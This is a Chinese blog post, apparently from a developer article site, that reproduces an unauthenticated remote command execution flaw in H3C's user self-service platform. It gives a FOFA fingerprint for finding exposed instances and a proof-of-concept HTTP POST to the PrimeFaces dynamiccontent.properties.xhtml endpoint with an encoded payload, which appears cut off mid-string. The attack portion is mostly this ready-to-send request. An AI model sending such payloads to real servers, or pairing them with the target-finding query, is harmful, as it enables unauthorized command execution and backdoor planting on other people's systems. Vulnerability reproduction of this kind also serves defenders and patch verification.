热门标签
热门文章
- 1kotlin基础学习笔记之第四章_kotlin internal
- 2免费GPT3.5_gpt3.5免费
- 3手把手教你完整Python接口自动化--附源码_接口自动化代码实例
- 4网络开发的隐形壁垒:如何巧妙解决跨域难题?
- 5微信小程序自动化测试——微信小程序云测服务_微信小程序自动化云测
- 6Error:Unknown host 'jcenter.bintray.com'. You may need to adjust the proxy settings in Gradle._learn about configuring http proxies in
- 7pytorch小白日记_python one = scores.new_tensor(1)
- 8YOLOv8-ROS-noetic+USB-CAM目标检测
- 9验证码技术指南:在线对“验证魔方”进行个性化配置
- 10OpenCV图像处理——对比两张图像差异的位置并标记_深度学习找出两张图片差异最大的区域
当前位置: article > 正文
H3C 用户自助服务平台 dynamiccontent.properties.xhtml RCE漏洞复现
作者:IT小白 | 2024-03-14 03:08:40
赞
踩
H3C 用户自助服务平台 dynamiccontent.properties.xhtml RCE漏洞复现
0x01 产品简介
H3C 用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。
0x02 漏洞概述
H3C 用户自助服务平台 dynamiccontent.properties.xhtml 接口出存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
0x03 复现环境
FOFA:fid="tPmVs5PL6e9m5Xt0J4V2+A=="
0x04 漏洞复现
PoC
- POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip
-
- pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gt
推荐阅读
相关标签
